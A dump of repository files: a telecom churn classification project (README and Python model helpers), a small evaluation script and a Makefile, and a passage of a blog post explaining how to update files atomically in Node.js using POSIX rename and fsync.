"text": "# Classification Project - Telecom Churn Rates\n- Wayne Lam\n- Object Oriented Approach to Classification Project (classification_funcs.py)\n\n## Goal\n- To find predictors for Telecom Churn Rates\n- To create a model to determine if a customer is to drop service plan (churn) based on various factors (VM, usage, etc.)\n\n## Data\n- From https://www.kaggle.com/becksddf/churn-in-telecoms-dataset\n- Evaluating features (variables) in telecom service that correlate with churn (unsubscribing from a service)\n- 20 initial features\n- 3333 data points\n- High class (churn vs. no churn) imbalance with churn being approximately 14.5% and not churn 85.5% of data points\n\n## EDA / Data Visualization\n- Several fairly prominent features: voicemail messages, total minutes across day/evening/night/international, total customer service calls\n- Colinearity between total minutes and total charges across day/evening/night/international\n- Having voicemail messages and not having voicemail messages also strongly correlated with churn rate, chi-squared well over critical value from alpha = 0.05\n\n\n\n\n## Feature Engineering and Selection\n- Features removed include phone number (identifying information/unnecessary), total charges (except international) removed by XGBoost (scores of 0 in feature importance)\n- Categorical variables area code and state have been dummied with the initial features dropped\n\n## Model Selection and Evaluation\n- F1 score for evaluation since accuracy may not reflect predictive strength of a model due to high class imbalance\n- XGBoost w/GridSearch CV, RandomForest w/GridSearch CV, AdaBoost used\n- With XGBoost w/GridSearch CV, initial pass used to remove \"unimportant\" features and second pass used for tuning hyperparameters\n- XGBoost had the highest F1 score: 0.854\n\n## Insights and future investigation\n- Tiered payment plan (possible unlimited plan), higher minutes increased churn rate\n- Possibly opt in voicemail plan (maybe default plan) since excess charge for individuals who do not use voicemail may turn to other plans\n- Future considerations: VM plan and if customer uses it, text and data plans (if the data is available)\n"
},
{
"alpha_fraction": 0.5335727334022522,
"alphanum_fraction": 0.5404160022735596,
"avg_line_length": 36.846153259277344,
"blob_id": "310ef7af063142241df4c94216717f9c68118e1f",
"content_id": "7409e5320e3a8cc5fdddb633814eef3dc2d9c8e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14759,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 390,
"path": "/classification_funcs.py",
"repo_name": "wplam107/classification_project",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn.preprocessing as preprocessing\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.utils import resample\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling import TomekLinks\nimport scipy.stats as stats\n\nclass ModelDF:\n def __init__(self, df, cat_features=[], target=''):\n self.df = df.copy()\n self.cat_features = cat_features\n self.target = target\n\n def cat_and_drop(self):\n print('---')\n try:\n for feat in self.cat_features:\n self.df[feat] = self.df[feat].astype('category')\n self.df = self.df.join(pd.get_dummies(self.df[feat], prefix='{}'.format(feat), drop_first=True))\n self.df.drop(columns=feat, inplace=True)\n print('Added dummies for and dropped \"{}\"'.format(feat))\n print('Now has {} columns'.format(self.df.shape[1]))\n except:\n print('No dummies added and no columns dropped')\n\n def _check_imbalance(self, col):\n '''\n Check class imbalance of target or feature\n Parameters\n ----------\n col = str, column to check class imbalance\n '''\n return self.df[col].value_counts(normalize=True), self.df[col].value_counts()\n\n def info(self):\n print('---')\n print('Shape: {}'.format(self.df.shape))\n for i in range(len(self.df.dtypes.unique())):\n print('There is/are {} {} feature(s)'.format(self.df.dtypes.value_counts()[i],\n self.df.dtypes.value_counts().index[i]))\n a, b = self._check_imbalance(col=self.target)\n print('---')\n print('Target Variable Class Ratios:\\n{}'.format(a))\n print('Target Variable Counts:\\n{}'.format(b))\n\n def new_cat(self, new_feat, old_feat, bin_point=0, equality='e'):\n '''\n Create new categorical feature from old feature\n Parameters\n ----------\n new_feat : str, name of new feature to be created\n old_feat : str, reference feature\n bin_point : int or float, point of binning, default 0\n equality : str, 'ge' is >=, 'g' is >, 'e' (default) is ==, 'le' is <=, 'l' is <\n '''\n if equality == 'e':\n self.df[new_feat] = np.where(self.df[old_feat] == bin_point, 1, 0)\n elif equality == 'ge':\n self.df[new_feat] = np.where(self.df[old_feat] >= bin_point, 1, 0)\n elif equality == 'g':\n self.df[new_feat] = np.where(self.df[old_feat] > bin_point, 1, 0)\n elif equality == 'le':\n self.df[new_feat] = np.where(self.df[old_feat] <= bin_point, 1, 0)\n else:\n self.df[new_feat] = np.where(self.df[old_feat] < bin_point, 1, 0)\n\n def preprocess(self, major, minor, test_size=0.2, random_state=0, samp_type=None, scaler=None):\n '''\n Get train-test split and resample data\n Parameters\n ----------\n test_size : float between 0 and 1, default = 0.2\n random_state : int, default = 0\n samp_type : str or None\n 'up' 'down' 'smote' 'tomek'\n scaler : str or None\n 'standard' 'minmax'\n '''\n self._tts(test_size=test_size, random_state=random_state)\n self._resample(samp_type=samp_type, random_state=random_state, major=major, minor=minor)\n self._scaler(scaler=scaler)\n\n\n def _getXy(self, X=None, y=None):\n '''\n Get X (features) and y (target)\n Parameters\n ----------\n X : List of strings\n features, default uses all columns\n y : Target variable\n default uses self.target\n '''\n if X == None:\n self.X = self.df.drop(self.target, axis=1)\n else:\n self.X = self.df[X]\n if y == None:\n self.y = self.df[self.target]\n else:\n self.y = self.df[y]\n print('X and y acquired')\n\n def _tts(self, test_size=0.2, random_state=0):\n '''\n Train test split on DataFrame\n Parameters\n ----------\n test_size : float between 0 and 1, default = 0.2\n random_state : int, default = 0\n '''\n self._getXy()\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(\n self.X, self.y, test_size=test_size, random_state=random_state)\n print('Data has been split into train and test sets')\n\n def _resample(self, major, minor, random_state=0, samp_type=''):\n '''\n Resample for binary class imbalance\n Parameters\n ----------\n samp_type : str\n 'up' 'down' 'smote' 'tomek'\n '''\n df = pd.concat([self.X_train, self.y_train], axis=1)\n major, minor = df[df[self.target] == major], df[df[self.target] == minor]\n\n if samp_type == 'up':\n print('Data upsampled')\n self._simple_resample(minor, major, random_state)\n elif samp_type == 'down':\n print('Data downsampled')\n self._simple_resample(major, minor, random_state)\n elif samp_type == 'smote':\n print('SMOTE performed')\n self._smote_data(random_state)\n elif samp_type == 'tomek':\n print('Tomek Links performed')\n self._tomek_data()\n else:\n print('No Resampling performed')\n\n def _simple_resample(self, change, goal, random_state):\n resampled = resample(change, replace=True, n_samples=len(goal), random_state=random_state)\n joined = pd.concat([goal, resampled])\n self.X_train, self.y_train = joined.drop(self.target, axis=1), joined[self.target]\n\n def _smote_data(self, random_state):\n sm = SMOTE(random_state=random_state)\n self.X_train, self.y_train = sm.fit_sample(self.X_train, self.y_train)\n\n def _tomek_data(self):\n tl = TomekLinks()\n self.X_train, self.y_train = tl.fit_sample(self.X_train, self.y_train)\n\n def _scaler(self, scaler=None):\n if scaler == 'standard':\n scale = StandardScaler()\n scale.fit_transform(self.X_train)\n scale.transform(self.X_test)\n elif scaler == 'minmax':\n scale = MinMaxScaler()\n scale.fit_transform(self.X_train)\n scale.transform(self.X_test)\n else:\n print('No Scaling performed')\n \n def _push_out(self):\n '''\n Removal of features with a score of 0 importance\n '''\n push = self.xgb_model.fit(self.X_train, self.y_train)\n worthless = [ self.X_train.columns[idx] for idx, val in enumerate(push.feature_importances_) if val == 0 ]\n self.X_train = self.X_train.drop(columns=worthless)\n self.X_test = self.X_test.drop(columns=worthless)\n num_pushed = len(worthless)\n print('---')\n print('Number of Features Removed: {}'.format(num_pushed))\n\n def get_xgb(self, gs=False, params=None, push_out=False):\n '''\n Instantiate and fit XGBoost model object with or without GridSearch to train set\n Default model as .xgb_model and GridSearch model as .gs_xgb\n\n Parameters\n ----------\n gs : bool\n True = XGBoost with GridSearch CV\n False (default) = default XGBoost\n params : dictionary\n parameters to run through GridSearch CV\n push_out : bool\n True = remove features with no importance and \n Warning alters X_train and X_test features\n '''\n if gs == True:\n xgb_model = xgb.XGBClassifier()\n self.gs_xgb = GridSearchCV(\n estimator=xgb_model,\n param_grid=params,\n scoring='f1',\n n_jobs=-1,\n verbose=1,\n cv=5)\n self.gs_xgb.fit(self.X_train, self.y_train)\n self.xgb_model = self.gs_xgb.best_estimator_\n preds = self.xgb_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n print('Best Parameters:\\n{}'.format(self.gs_xgb.best_params_))\n\n if push_out == True:\n self._push_out()\n self.gs_xgb = GridSearchCV(\n estimator=xgb_model,\n param_grid=params,\n scoring='f1',\n n_jobs=-1,\n verbose=1,\n cv=5)\n self.gs_xgb.fit(self.X_train, self.y_train)\n self.xgb_model = self.gs_xgb.best_estimator_\n self.xgb_model.fit(self.X_train, self.y_train)\n\n preds = self.xgb_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy After Push Out: %f\" % (test_acc))\n print(\"F1 After Push Out: %f\" % (test_f1))\n print('Best Parameters After Push Out:\\n{}'.format(self.gs_xgb.best_params_))\n\n else:\n self.xgb_model = xgb.XGBClassifier().fit(self.X_train, self.y_train)\n self.xgb_model.fit(self.X_train, self.y_train)\n \n if push_out == True:\n self._push_out()\n self.xgb_model.fit(self.X_train, self.y_train)\n\n preds = self.xgb_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n \n def _best_feats(self):\n features = [ (self.X_train.columns[idx], round(val, 4))\n for idx, val in enumerate(self.xgb_model.feature_importances_)\n if val != 0 ]\n best = sorted(features, key=lambda x:x[1], reverse=True)[:10]\n return best\n \n def plot_bf(self):\n '''\n Bar Plot of top 10 features in XGBoost\n '''\n best = pd.DataFrame(self._best_feats(), columns=['Features', 'Importance'])\n f, ax = plt.subplots(figsize = (25,5))\n sns.barplot(x='Features', y='Importance', data=best)\n plt.show()\n\n def get_rf(self, gs=False, params=None):\n '''\n Instantiate and fit RandomForest model object with or without GridSearch to train set\n Default model as .rf_model and GridSearch model as .gs_rf\n Parameters\n ----------\n gs : bool\n True = RandomForest with GridSearch CV\n False (default) = default RandomForest\n params : dictionary\n parameters to run through GridSearch CV\n '''\n if gs == True:\n self.rf_model = RandomForestClassifier()\n self.gs_rf = GridSearchCV(\n estimator=self.rf_model,\n param_grid=params,\n scoring='f1',\n n_jobs=-1,\n verbose=1,\n cv=5)\n self.gs_rf.fit(self.X_train, self.y_train)\n\n preds = self.gs_rf.best_estimator_.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n print('Best Parameters:\\n{}'.format(self.gs_rf.best_params_))\n\n else:\n self.rf_model = RandomForestClassifier().fit(self.X_train, self.y_train)\n self.rf_model.fit(self.X_train, self.y_train)\n\n preds = self.rf_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n\n# Functions for EDA and Feature Engineering\n\ndef multi_plot(df, plot='hist', target=''):\n '''\n Plotting continuous features for EDA\n Parameters\n ----------\n df : DataFrame\n type : str\n 'hist' as histogram or 'lmplot' as lmplot\n target : str\n target variable\n '''\n for col in df.columns:\n if df[col].dtype == 'float64' or df[col].dtype == 'int64':\n if plot == 'hist':\n df.hist(col)\n plt.show()\n elif plot == 'lmplot':\n sns.lmplot(x=col, y=target, data=df, logistic=True)\n plt.show()\n\ndef colin_plt(df, target='', context='poster', figsize=(20,10), ft_scale=0.7):\n sns.set(rc = {'figure.figsize':figsize})\n sns.set_context('poster', font_scale=ft_scale)\n sns.heatmap(df.drop(target, axis=1).corr(), cmap='Reds', annot=True)\n plt.show()\n\ndef chi_sq(df, feature='', target='', bin_point=0):\n '''\n Chi-Squared test for single feature, uses alpha = 0.05 and ddof = 1\n Parameters\n ----------\n feature : str\n feature column to inspect as str\n target : str\n target variable\n bin_point : int or float, default = 0\n the equal or less than point where to bin as int or float\n '''\n def _bin_bin(df):\n el_bin_t = len(df.loc[(df[feature] <= bin_point) & (df[target] == True)])\n el_bin_f = len(df.loc[(df[feature] <= bin_point) & (df[target] == False)])\n g_bin_t = len(df.loc[(df[feature] > bin_point) & (df[target] == True)])\n g_bin_f = len(df.loc[(df[feature] > bin_point) & (df[target] == False)])\n return el_bin_t, el_bin_f, g_bin_t, g_bin_f\n \n el_t, el_f, g_t, g_f = _bin_bin(df)\n\n tot_t = el_t + g_t\n tot_f = el_f + g_f\n tot_el = el_t + el_f\n tot_g = g_t + g_f\n\n ex_elt = tot_el * tot_t/(tot_t+tot_f)\n ex_elf = tot_el * tot_f/(tot_t+tot_f)\n ex_gt = tot_g * tot_t/(tot_t+tot_f)\n ex_gf = tot_g * tot_f/(tot_t+tot_f)\n\n chi, p = stats.chisquare([el_t, el_f, g_t, g_f], [ex_elt, ex_elf, ex_gt, ex_gf], ddof=1)\n if chi > 3.8415:\n print('Reject Null Hypothesis')\n else:\n print('Cannot Reject Null Hypothesis')\n print('Chi-Squared: {}'.format(chi))\n print('p-value: {}'.format(p))"
}
] | 2 |
Minn-Yxm/bert_in_keras | https://github.com/Minn-Yxm/bert_in_keras | 05532075cecc07ad11620d2154b9e550d627b382 | 2443ca91ad1d078bd8c10f5e5e602b4d410030a8 | 37cac73643aa57cb55c9739c3d7ab3754239801c | refs/heads/master | 2020-12-03T11:07:19.687820 | 2020-01-06T12:25:35 | 2020-01-06T12:25:35 | 231,293,142 | 0 | 0 | null | 2020-01-02T02:28:55 | 2020-01-01T06:52:19 | 2019-10-24T03:41:03 | null | [
{
"alpha_fraction": 0.7435897588729858,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 18.625,
"blob_id": "d7bae86dd061864bd661828dfedf3e5f11729ef1",
"content_id": "1c354a10d945e83491f92390b67af9311bc36e89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/val.py",
"repo_name": "Minn-Yxm/bert_in_keras",
"src_encoding": "UTF-8",
"text": "import json\nimport relation_extract\n\ntest_data=[]\nf = json.load(open('../datasets/test_data_me.json'))\ntest_data.extend(f)\n\nrelation_extract.test(test_data)"
}
] | 1 |
espadrine/espadrine.github.com | https://github.com/espadrine/espadrine.github.com | 2d45042f60c16481ceeb527ddbdf61d75f880323 | 1bb53b2f9b4124d78192a005aa06fa2a94c2fd96 | 52016dee706b9ac4df7d065129c44ab862e435d9 | refs/heads/master | 2023-08-11T10:10:03.579248 | 2023-07-24T22:54:59 | 2023-07-24T22:54:59 | 2,561,955 | 2 | 1 | null | 2011-10-12T11:41:31 | 2019-05-10T08:13:37 | 2019-05-10T08:54:39 | HTML | [
{
"alpha_fraction": 0.692108690738678,
"alphanum_fraction": 0.7736093401908875,
"avg_line_length": 50.53333282470703,
"blob_id": "a82d9cb30b53165f7383996a7b9dbccfd99aa91f",
"content_id": "e12e9262ce8ca16f1b66d5b79d8235a3b92ca77d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 15,
"path": "/blog/assets/chinchilla-s-death/Makefile",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "LLAMA1_DATA_PIXELS = data/llama1-7B-pixels.tsv data/llama1-13B-pixels.tsv data/llama1-33B-pixels.tsv data/llama1-65B-pixels.tsv\nLLAMA1_DATA = data/llama1-7B.tsv data/llama1-13B.tsv data/llama1-33B.tsv data/llama1-65B.tsv\nLLAMA2_DATA_PIXELS = data/llama2-7B-pixels.tsv data/llama2-13B-pixels.tsv data/llama2-34B-pixels.tsv data/llama2-70B-pixels.tsv\nLLAMA2_DATA = data/llama2-7B.tsv data/llama2-13B.tsv data/llama2-34B.tsv data/llama2-70B.tsv\n\nall: llama1-training-speed.svg llama2-training-speed.svg\n\nllama1-training-speed.svg: llama1.plot $(LLAMA1_DATA)\n\tgnuplot llama1.plot >$@\n\nllama2-training-speed.svg: llama2.plot $(LLAMA2_DATA)\n\tgnuplot llama2.plot >$@\n\n$(LLAMA1_DATA) $(LLAMA2_DATA): llama-data.py $(LLAMA1_DATA_PIXELS) $(LLAMA2_DATA_PIXELS)\n\tpython3 llama-data.py\n"
},
{
"alpha_fraction": 0.7485818862915039,
"alphanum_fraction": 0.7572677731513977,
"avg_line_length": 46.80791091918945,
"blob_id": "5d77e3653c4455b6a2ff503b4008e642348e3ec1",
"content_id": "57b6ead8dd186d06e2ad3110a35762e1d06f5072",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16975,
"license_type": "no_license",
"max_line_length": 338,
"num_lines": 354,
"path": "/blog/src/file-system-object-storage.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Insanities of a File System Object Storage\n\n*(TL;DR: I present [fsos][]; but read on to know why.)*\n\nHow do you update a file in Node.js?\n\nWell, let's browse our dear [file system API][]…\n\n[file system API]: https://nodejs.org/api/fs.html\n\n```js\nfs.writeFile(file, data)\n```\n\nSimple enough, isn't it?\n\nAnd yet, there are so many kinds of wrong in this seemingly obvious answer.\n\n## POSIX\n\nLet's first educate ourselves. Node.js' file system API is designed to imitate\nand target POSIX, a specification to etch the core Unix experience in granite.\nWhile the main reason for the success of Unix was portability, ensuring that\nuserland programs could run on different machines, the three tenets of its\ndesign were also delicious (**plain text** as universal interface, composable\nprograms via a **shell**, and a **hierarchical file system** offering a unified\ninterface to kernel functionality (not just data storage)).\n\nNaturally, everybody stole those juicy ideas. When Richard Stallman famously\nchose to write a free operating system to oppose what we would today call DRM,\nhe wanted Unix compatibility. When compatibility is seeked, standardization\nbecomes necessary. IEEE sprung into action in the form of SUS (the Single Unix\nSpecification), and, with Richard's suggested name, wrote the Portable Operating\nSystem Interface, **POSIX**.\n\nRichard's baby, **GNU**, had little impact without a proper kernel. It was a\nmere collection of programs that would talk to a Unix file system if there was a\nfree one. Fortunately, a free one arose, birthed as **Linux**, and gained major\nadoption thanks to its sweet mix of speed, stability, and a healthy dose of\nbright experiments. When **Node.js** was created, Linux was the overwhelming\nking of the server-side, which Node.js wanted to conquer.\n\nIn a way, the reason that the obvious one-liner above doesn't work is Unix'\nfault. It designed file interaction in a manner that made a lot of sense for\nsome uses of the file system, disregarding others. Behind the covers, each\nfile is a mere set of contiguous disk space (blocks, extents, or sectors) that\npoint to each other, so it stands to reason that appending data at the end is\nprobably faster than appending it at the beginning, just as it is with a diary.\n\nThe standard C library defined by POSIX reflects the internal design of Unix\nfile systems without hiding its flaws. Consequence: internally non-obvious\noperations have non-obvious solutions, and non-solutions that are as tempting to\nuse as a chocolate cookie (up until your tongue warns you that it was in fact\nraisins).\n\nThe most critical interface for file operations is [open][]. It returns a file\ndescriptor to operate the file. It takes a handful of required flags and a ton\nof optional ones. Most famous amongst the required ones are `O_RDONLY` if you\nwill only read, `O_WRONLY` if you don't feel like reading anymore, and `O_RDWR`\nif you hate picking a side.\n\nAmong the optional flags, `O_CREAT` creates the file automatically if it doesn't\nexist, `O_TRUNC` empties the file, and `O_APPEND` forces you to write only at\nthe end. (What a coincidence that appending is both fast in file systems and\nhas a shortcut!)\n\nHowever, most people use [fopen][], a layer on top of [open][], which\nunfortunately has very strange defaults. Instead of the flags we understand, it\nhas string modes that seem to mean something they do not do. Here are the\nnonsensical rules.\n\n- `\"r\"` is the only one that prevents writing,\n- If the string has an `r`, it doesn't create a file automatically,\n- If the string does not have a `+`, it cannot both read and write,\n- If the string has a `w`, it empties the file,\n- If the string has an `a`, all writes append to the file (finally one that\n does what is on the cover!)\n\nFor instance, `\"r+\"` can write, but won't create a file automatically for some\nreason.\n\nThe modes offered by [fopen][] barely target what people actually do with a\nfile:\n\n1. Read a configuration file: `\"r\"`,\n2. Write logs: `\"a\"`,\n3. Update a whole file: nothing.\n\nFor more precise operations, use `\"r+\"`. All other possibilities are most likely\nbugs waiting to be found. Special mention to `\"w+\"` which empties the file it\nallows you to read! In fact, the main lesson of this blog post is that `O_TRUNC`\nhas only one, very rare, use-case: *emptying a file, without removing it,\nwithout writing to it*. You should essentially never use `\"w\"`.\n\nNaturally, Node.js favours [fopen][]-style modes, instead of the more elegant\n[open][].\n\nNaturally, its default mode for write operations is the useless `\"w\"`.\n\n[open]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html\n[fopen]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/fopen.html\n\n## Async IO\n\nNow that we have background information, let's dig into the first issue.\n\nA long-standing problem in HTTP server software is [C10K][], ie. hitting 10k\nconcurrent clients to serve with a single machine. A large part of beating that\nfigure is dealing with how slow IO is. Fetching a file on disk takes a long\ntime! And by default, POSIX system calls make your program wait for the file to\nbe read, and your program just sits there doing nothing in the meantime, like a\npassenger waiting for the bus to come.\n\n[C10K]: http://www.kegel.com/c10k.html\n\nFortunately, POSIX includes a special switch to avoid waiting: `O_NONBLOCK`. It\nis part of [open][]. When an IO operation is performed, you can do whatever you\nwant, even though the operation is not done. Later on, you can call `poll()` or\n`select()` or `kqueue()` (depending on the OS you use), and learn whether the\noperation is done.\n\nNode.js' *raison d'être* was completely focused on how easy JS makes\nasynchronous operations. Their whole file system interface recommends using the\nnon-blocking API. But in some cases, it makes zero sense. So it is with\n`fs.writeFile()`. It *never* does what you want. Not with the default\nparameters, anyway.\n\nWhen you use storage, you implicitly expect some level of consistency. If you\nwrite 'hello' to a file which contains 'hi' and then immediately read from it,\nyou don't expect to read 'who is this?' if absolutely nobody wrote to the file\nin the meantime. You expect 'hello' — or, at least, 'hi'. But here, you will\nread neither what was in the file before, nor what you wrote in it.\n\n```js\nvar fs = require('fs')\nvar fn = './foo' // file name\nfs.writeFileSync(fn, '1234\\n')\nfs.createReadStream(fn).pipe(process.stdout) // → 1234\nfs.writeFile(fn, '2345\\n')\nfs.createReadStream(fn).pipe(process.stdout) // The file is empty.\n```\n\nThis is the code I submitted as [an issue][old issue] to Joyent's node (prior to\nthe io.js fork).\n\n[old issue]: https://github.com/nodejs/node-v0.x-archive/issues/7807\n\nSo what is going on? Why does it break your implicit consistency expectations?\nIt turns out that the operations you use are not atomic. What `fs.writeFile()`\nreally means is “Empty the file immediately, and some day, please fill it with\nthis.” In POSIX terms, you perform an\n`open(…, O_WRONLY|O_CREAT|O_TRUNC|O_NONBLOCK)`, and the `O_TRUNC` empties the\nfile. Since it is `O_NONBLOCK`, the next line of code gets executed immediately.\nThen, Node.js' event loop spins: on the next tick, it polls, and the file system\ntells it that it is done (and indeed, it is). Note that it can take many more\nevent loop ticks, if there is a larger amount of data written.\n\nFundamentally, why would you ever want those default flags (aka. `fopen`'s\n`'w'`)? If you are writing logs or uploading a file to the server, you want\n`'a'` instead; if you are updating configuration files or any type of data, you\nwant… something that will be described in the next chapter. For any type of file\nthat has the risk of being read, this default flag is the wrong one to use.\n\nSo, the problem is that it was non-blocking, right? After all, if we change it\nto be synchronous, it all seems to work, right?\n\n```js\nvar fs = require('fs')\nvar fn = './foo' // file name\nfs.writeFileSync(fn, '1234\\n')\nfs.createReadStream(fn).pipe(process.stdout) // → 1234\nfs.writeFileSync(fn, '2345\\n')\nfs.createReadStream(fn).pipe(process.stdout) // → 2345\n```\n\nDon't you hate it when you read a blog post, and the author ends two\nconsecutive sentences with “right?”, and you just know it means “false!”\n\n## File Systems\n\nWhat if your application crashes?\n\nHaving your app crash just after you opened the file for writing, but before it\nis done writing, will unsurprisingly result in a half-written file — or an empty\none. Since the memory of the crashed app is reclaimed, the data that was not\nwritten is lost forever!\n\nYou want to *replace a file*. Therefore, even if the application crashes, you\nwant to make sure that you maintain either the old version, or the new version,\nbut not an in-between. `fs.writeFileSync()` does not offer that guarantee, just\nas the underlying POSIX primitives. It is tempting, but wrong.\n\nIn [the words][Ts'o comment] of Theodore Ts'o, maintainer of ext4, the most used\nfile system on Linux and possibly in the world (and creator of `/dev/random`):\n\n> Unfortunately, there very many application programmers that attempt to update an existing file’s contents by opening it with O_TRUNC. I have argued that those application programs are broken, but the problem is that the application programmers are “aggressively ignorant”, and they outnumber those of us who are file system programmers.\n\n[Ts'o comment]: http://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/comment-page-5/#comment-2782\n\nThe fundamental issue is that `fs.writeFileSync()` is not atomic. It is a series\nof operations, the first of which deletes the old version of the file, the next\nones slowly inserting the new version.\n\nWhat do we want? The new version! When do we want it? Once written on disk,\nobviously. We have to first write the new version on disk, alongside the old\none, and then switch them. Fortunately, POSIX offers a primitive that performs\nthat switch *atomically*. World, meet [`rename()`][rename].\n\n[rename]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/rename.html\n\n```js\nvar tmpId = 0\nvar tmpName = () => String(tmpId++)\nvar replaceFile = (file, data, cb) => {\n var tmp = tmpName()\n fs.writeFile(tmp, data, err => {\n if (err != null) { cb(err); return }\n fs.rename(tmp, file, cb)\n })\n}\n```\n\nObviously, I simplify a few things in this implementation:\n\n- We have to verify that the `tmp` file does not exist,\n- We should make `tmp` have a UUID to reduce the risk that another process\n creates a file with the same name between the moment we check for its\n existence and the moment we write to it,\n- We said before that Node.js was using `'w'` as the default write flag; we want\n to use at least `'wx'` instead. `x` is a Node.js invention that uses `O_EXCL`\n instead of `O_TRUNC`, so that the operation fails if the file already exists\n (we would then retry with a different UUID),\n- We need to create `tmp` with the same permissions as `file`, so we also need\n to `fs.stat()` it first.\n\nAll in all, the finished implementation is nontrival. But this is it, right?\nThis is the end of our ordeal, right? We finally maintained consistency, right?\n\nI have good news! According to POSIX, yes, this is the best we can do!\n\n## Kernel Panics\n\nWe settled that *write temporary then rename* survives app crashes under\nPOSIX. However, there is no guarantee for system crashes! In fact, POSIX gives\nabsolutely no way to maintain consistency across system crashes with certainty!\n\nDid you really think that being correct according to POSIX was enough?\n\nWhen Linux used ext2 or ext3, app developers used *truncate then write* or the\nslightly better *write temporary then rename*, and everything seemed fine,\nbecause system crashes are rare. Then a combination of three things happened:\n\n- Unlike ext3, ext4 was developed with **delayed allocation**: writes are\nperformed in RAM, then it waits for a few seconds, and only then does it apply\nthe changes to disk. It is great for performance when apps write too often.\n- GPU vendors started writing drivers for Linux. Either they didn't care much\nabout their Linux userbase, or all their drivers are faulty: the case remains\nthat **those drivers crashed a lot**. And yet, the drivers are part of the\nkernel: they cause system crashes, not recoverable application crashes.\n- **Desktop Linux** users started playing games.\n\nWhat had to happen, happened: a user played a game that crashed the system, at\nwhich point all files that had been updated in the past 5 seconds were zeroed\nout. Upon reboot, the user had lost a lot of data.\n\nThere were a lot of sad Linux users and grinding of teeth. As a result, Theodore\nTs'o [patched][delayed allocation] the kernel to detect when apps update files\nthe wrong way (ie, both *truncate then write* and *write temporary then\nrename*), and disabled delayed allocation in those cases.\n\nYes. *Write temporary then rename* is also the wrong way to update a file. I\nknow, it is what I just advised in the previous section! In fact, while POSIX\nhas no way to guarantee consistency for file updates, here is the closest thing\nyou'll get:\n\n1. Read the file's permissions.\n2. Create a temporary file in the same directory, with the same permissions,\nusing `O_WRONLY`, `O_CREAT` and `O_EXCL`.\n3. Write to the new file.\n4. [`fsync()`][fsync] that file.\n5. Rename the file over the file you want to update.\n6. `fsync()` the file's directory.\n\n[fsync]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/fsync.html\n\nIsn't it [obvious][don't fear the fsync] in retrospect?\n\n[don't fear the fsync]: http://thunk.org/tytso/blog/2009/03/15/dont-fear-the-fsync/\n\n*Renaming the file before it is `fsync`'ed* creates a window of time where a\ncrash would make the directory point to the updated file, which isn't committed\nto disk yet (as it was in the file system cache), and so the file is empty or\ncorrupt.\n\nLess harmful, *a crash after renaming and before the directory's cache is\nwritten to disk* would make it point to the location of the old content. It\ndoesn't break atomicity, but if you only want to perform some action after the\nfile was replaced *for sure*, you would better `fsync` that directory before you\ndo something you will regret. It might seem like nothing, but it can break your\nassumptions of data consistency.\n\nIf you own an acute sense of observation, you noticed that, while Theodore's\npatch makes it less likely that “badly written file updates” will cause files to\nbe zeroed out upon a system crash, the bug always existed and still exists! The\ntimespan where things can go horribly wrong is only reduced. The fault is\nrejected on the app developers.\n\nThis issue was “fixed” — well, the patch landed at least — in Linux 2.6.30 on\nthe most common file systems (ext4 and btrfs).\n\n[delayed allocation]: http://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/\n\n## Conclusion\n\nHere's one thing to get away from all this: file systems have a design which\nworks well with certain operations and… not so well… with others. **Replacing a\nfile is costly!** You should know what you are doing (or use [fsos][], my npm\nlibrary which wraps all of this in sweet promises), and only replace files at\nworst a few times a second. Ideally a lot less often, especially for large\nfiles.\n\nRealistically, though, what you fundamentally want is not to lose work that is\nolder than X seconds, for some value of X that is thankfully often larger than\na half.\n\nBesides, this is Node.js. One issue that is common elsewhere with a trivial\nimplementation is that the main thread waits for the I/O to be finished before\nit can move on. In Node.js, we get asynchrony for free. The file replacement\nhappens essentially in the background. The main thread stays as responsive as a\nhappy antelope!\n\n[fsos]: https://www.npmjs.com/package/fsos\n\nPS: I feel like I should also advocate for a few things. For every mistake,\nthere is both a lesson and a prevention; we have only just learned the lesson.\nProgrammers go to the path of least resistance, and what they face 